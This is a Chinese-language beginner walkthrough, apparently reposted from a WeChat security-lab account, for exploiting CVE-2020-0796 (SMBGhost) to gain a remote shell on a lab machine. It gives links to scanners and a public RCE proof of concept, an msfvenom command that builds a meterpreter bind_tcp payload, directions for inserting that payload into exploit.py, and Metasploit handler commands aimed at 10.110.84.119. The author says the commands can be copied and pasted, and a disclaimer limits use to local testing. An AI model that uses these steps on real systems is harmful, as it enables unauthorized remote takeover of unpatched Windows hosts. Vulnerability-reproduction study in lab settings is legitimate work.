1.通过扫描工具检测目标主机是否存在漏洞,可以使用以下工具进行扫描:
Windows工具:
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
Linux工具:
https://github.com/dickens88/cve-2020-0796-scanner
PS:windows系统直接打开exe文件运行会闪退,将文件拖入cmd回车运行即可
2.先查看kali与靶机是否互能互ping通,能ping通即可
3.通过扫描得知:该目标主机存在smb漏洞,可以远程执行。
4.远程利用PoC漏洞:
https://github.com/chompie1337/SMBGhost_RCE_PoC
将此POC漏洞下载至Kail中,通过解压得到了以下文件:
5.使用msfvenom生成payload
msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o evil.py
运行之后会在桌面上得到一个文件
6.我们准备文本替换和修改:
我们打开刚才解压的压缩包,将evil.py 生成的数据全部复制,在wps中打开
在WPS的右上角的查找替换进行如下命令:
替换之后得到了新的数据:
此操作就是将原来的表头buf修改成为USER_PAYLOAD,这里我附上参数,方便大家复制粘贴
参数buf改为USER_PAYLOAD
之后我们把修改好的项目数据全部复制,打开exploit.py,把数据替换到exploit.py的USER_PAYLOAD参数,将此参数全部替换。保存后即可。
最后我们打开kail的msf工具:
Msf工具启动命令:
msfconsole
启动kail的监听模块:
use exploit/multi/handler
设置模块连接:
set payload windows/x64/meterpreter/bind_tcp
设置端口监听:
set lport 1234
设置攻击主机地址:
set rhost 10.110.84.119
新建终端命令行,打开我们解压的文件,步骤如下
python3 exploit.py -ip 10.110.84.119
如果看到了这个界面,直接回车,出现这个就是执行成功
最后我们启动设置的模块脚本直接执行命令:
run
发现在msf控制台成功获得反弹shell,我们输入shell后会出现目标主机终端命令行,此时我们发现乱码,需要进行页面编码修改
发现有乱码,执行chcp 65001后显示正常,输入后需要回车
最后我们执行ipconfig
之后我们就获得了目标主机的终端行,最后我们查看目标主机的终端,执行ipconfig
最后检查,我们拿到的shell和靶机的一致,代码都在文章内,可以直接复制粘贴,有不懂的地方可以直接联系我!
文章仅供技术参考和本地漏洞测试复现,一切后果由使用者承担,与本号无关,切勿知法犯法!!!!
原文始发于微信公众号(云延网络攻防实验室):小白级CVE-2020-0796漏洞复现教程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论